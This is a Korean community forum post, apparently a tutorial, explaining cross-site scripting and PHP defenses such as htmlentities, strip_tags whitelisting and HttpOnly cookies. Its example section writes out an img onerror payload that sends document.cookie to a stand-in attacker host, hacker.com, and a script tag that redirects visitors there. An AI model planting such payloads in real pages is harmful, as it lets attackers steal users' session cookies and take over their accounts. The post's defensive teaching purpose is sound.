• 목록
  • 아래로
  • 위로
  • 1
  • title: 황금 서버 (30일)humit
  • 조회 수 734

※ 주의 : 이 내용에 있는 방법을 이용해 다른 사이트를 해킹하려고 시도를 할 경우 법적인 처벌을 받을 수 있습니다. 단순히 참고용 혹은 대비 방법에 대해 익히는 정도로만 이해를 하시면 됩니다.

 

아마 여기에 있는 분들은 모두 자신만의 홈페이지를 꾸미는 것을 목표로 할 것입니다. 물론 홈페이지를 꾸미는 것도 좋지만 보안의 경우에도 신경을 쓰는 것이 좋습니다. 보안에 신경을 쓰지 않는다면 그 서버는 해커에 의해서 털리게 되고, 또한 그렇게 되면 해커가 그 서버를 경유지로 해서 다른 서버도 터는 것이 가능해지기 때문에 위험합니다. 저의 경우에도 이와 비슷한 일을 겪을 뻔 했습니다....

그렇기 때문에 보안을 신경쓰는 것이 중요합니다. 이번 내용에서는 XSS가 무엇인지에 대해 살펴보고, 이를 어떻게 막을 수 있는지에 대해 알아보도록 하겠습니다.

 

1. XSS란 무엇인가?

XSS는 cross-site scripting의 약자로 한국말로는 사이트 간 스크립팅이라고 합니다. 이를 이용해서 해커는 사용자의 권한을 탈취하여 그 사용자인것 마냥 행동을 할 수도 있고, 혹은 사이트의 동작을 이상하게 만들어버릴 수도 있습니다. (이상한 사이트로 리다이렉트를 시킨다는 등..) 만약 관리자의 권한이 탈취당하게 된다면 대형 사고가 터질 수 있겠지요...

 

2. 대표적인 공격 예시. (실제로 동작하는 서버에 절대로 시도하지 마세요!!)

2.1. 사용자 권한 탈취하기.

보통 사용자 권한은 cookie를 이용해서 체크를 합니다. 즉 cookie라는 값이 카드키라고 생각을 하시면 됩니다. 만약 이 카드키를 복제한다면 권한이 없는 사람도 들어올 수 있겠지요. XSS를 이용하면 다른 사람의 cookie 정보를 가져올 수 있습니다.

만약 게시판에 XSS 공격이 막혀있지 않다면, 게시글의 내용에 <img src="/" onerror="this.src='http://hacker.com/?cookie='+encodeURIComponent(document.cookie)"/>와 같은 방식으로 작성을 하게 되면 cookie 값이 해커의 서버로 들어가게 됩니다.

즉 이렇게 얻은 cookie 값으로 해커가 쿠키 변조를 해서 접속을 하면 그 사용자처럼 행동이 가능합니다.

 

2.2. 이상한 사이트로 리다이렉트

Javascript에서 리다이렉트를 시키는 방법을 이용하는 방법입니다. 간단한 방법은 <script>location.href="http://hacker.com/";</script> 과 같은 방식을 사용하면 됩니다.

 

3. 어떻게 공격을 막을 것인가?

먼저 Wordpress나 XE와 같은 CMS를 이용하고 있는 경우에는 새로운 보안 업데이트가 나오면 바로바로 적용을 해주도록 합니다. 우리가 신경쓸 필요 없이 알아서 개발자 분들이 보안 업데이트를 해주시니 편리하게 바로바로 적용을 할 수 있습니다.

문제는 직접 PHP 코드를 작성해 게시판과 같은 기능을 구현하려고 하는 경우입니다. 이 경우에는 3가지 정도의 방안이 있습니다.

 

첫 번째 방법은 아예 HTML Markup이 되지 않도록 적용하는 방법입니다. 이 방법은 Naver나 Daum, Tistory 등에서의 댓글에서 채택한 방법입니다. 즉 HTML에서 태그를 나타내는 기호인 <와 >를 각각 < >로 변경해서 화면에서 <와 >로 보이게 하는 방식입니다.

이를 PHP에서는 htmlentities 함수를 사용하면 됩니다. (<?=htmlentities($content);?>와 같이 사용하시면 됩니다.)

 

두 번째 방법은 white list를 이용하는 방법입니다. 이 방법은 일부 태그를 허용해주게 하는 방법(이미지 태그나 혹은 강조를 위한 <b> 태그 등..)으로 Wordpress의 댓글에서 채택한 방법입니다. 즉 어떤 태그가 동작하지 않도록 하는 것이 아니라 동작을 하게 할 태그를 골라낸다는 것입니다.

PHP에서는 strip_tags함수를 이용하면 쉽게 구현을 할 수 있습니다. 첫 번째 인자는 전체 문자열을 주고, 두 번째 인자로는 허용할 태그를 표현하면 됩니다. 예를 들어 <p>와 <a> 태그만을 허용하려면, <?=strip_tags($content, '<p><a>');?>와 같이 사용하시면 됩니다.

 

세 번째 방법은 브라우저가 업데이트 되면서 추가된 기능인 쿠키에서의 HTT_ONLY 옵션입니다.

이 옵션이 true인 경우에는 자바스크립트 상에서 document.cookie와 같이 쿠키 값을 리턴하는 것을 호출하더라도 해당되는 쿠키의 값이 노출이 안되는 것입니다. 대부분의 사이트가 이 옵션을 기본적으로 사용하고 있습니다.

다만 이 방법의 경우 버전이 낮은 브라우저에 대해서는 적용이 안된다는 단점이 있습니다.

PHP에서 적용하는 방법은 http://php.net/manual/kr/function.session-set-cookie-params.php를 참조하시기 바랍니다.

 

4. 에필로그

이렇게 XSS가 무엇이고 이를 막기 위해서 어떤 방법을 취할 수 있는지에 대해서 살펴보았습니다. 다음 내용은 아마 SQL Injection이 무엇인지와 이를 어떻게 방어할 수 있는지에 대해 작성해보도록 하겠습니다.

 

5. 참고 자료

https://ko.wikipedia.org/wiki/사이트_간_스크립팅

http://php.net/manual/kr/function.htmlentities.php

http://php.net/manual/kr/function.strip-tags.php

http://php.net/manual/kr/function.session-set-cookie-params.php

 

 

작성자
title: 황금 서버 (30일)humit 119 Lv. (0%) 1183070/115200000EXP

Study For Us Hosting 1기 모니터링 관리자 (16.12.01 ~ 17.01.08.)

C++, Python, PHP를 주로 사용하며 알고리즘, DL, 해킹 쪽에 관심이 있습니다.

휴학생입니다.

티스토리 블로그 : http://humit.tistory.com/

카카오톡 봇 : http://pf.kakao.com/_Efrbu/chat

지식인 프로필 : https://kin.naver.com/profile/jhjang1005

댓글 1

신고

"하루살이님의 댓글"

이 댓글을 신고 하시겠습니까?

권한이 없습니다.
번호 제목 글쓴이 날짜 조회 수
공지 시스템 점검 작업 완료 안내 10 마스터 마스터 24.09.05.16:25 2058
공지 [중요] 호스팅 만료와 관련하여 일부 수칙이 변경됩니다. 4 마스터 마스터 23.01.14.02:23 8850
279 35. FASTA와 FASTAQ 파일이었츄 image 국내산라이츄 국내산라이츄 21.12.09.13:27 3237
278 34. 단백질이 접히는 과정츄 5 image 국내산라이츄 국내산라이츄 21.11.16.12:38 3510
277 33. 그래프 이론이었츄 4 image 국내산라이츄 국내산라이츄 21.11.12.12:56 1022
276 32. SMILES였츄 image 국내산라이츄 국내산라이츄 21.11.12.11:45 573
275 31. EC50과 IC50이었츄 12 image 국내산라이츄 국내산라이츄 21.10.31.23:32 2777
274 30. 밀도에 대해 알아보시츄 image 국내산라이츄 국내산라이츄 21.10.19.23:40 3422
273 [최적화] 중첩 반복문은 안감을 두껍게 짜야한다. 5 image 네모 네모 21.09.30.09:55 1495
272 [PHP] 생성자 승격 2 image 네모 네모 21.09.30.09:55 784
271 [PHP] Attribute image 네모 네모 21.08.14.17:01 686
270 [Python] 그누보드 자동 글 작성 + 멀티 파일 업로드 스크립트 1 image 이니스프리 이니스프리 21.05.16.09:32 23889
269 [Design] 금은동 색상코드 3 image 네모 네모 21.05.14.22:41 2734
268 집에서 서버 돌려도 괜찮을까요? 13 NoYeah NoYeah 21.05.12.23:50 3262
267 0. 행의 분리 및 결합 / 멀티라인 문자열 image 이니스프리 이니스프리 21.04.18.11:53 607
266 [CSS] 웹폰트 선언하기 1 네모 네모 21.04.09.17:03 509
265 [Swift] ARM 맥에서 Cocoapods 사용하기 3 네모 네모 21.04.04.13:36 644
264 php의 숫자 연산자 image wikiowner 21.03.13.15:50 572
263 [미디어위키 번외] 제가 유지보수 중인 나무마크를 홍보(?)합니다. 10 image title: 은메달도다 21.03.11.01:23 1031
262 [Selenium] proxy를 사용하지 않고 개발자도구에서 Network 탭의 로그를 얻기 image 이니스프리 이니스프리 21.03.06.23:35 1811
261 [3] php의 문자열 출력하기 (줄바꾸기, echo, print 등등) 2 wikiowner 21.03.06.18:54 721
260 [2] php코드의 작성방법 3 wikiowner 21.03.06.14:53 496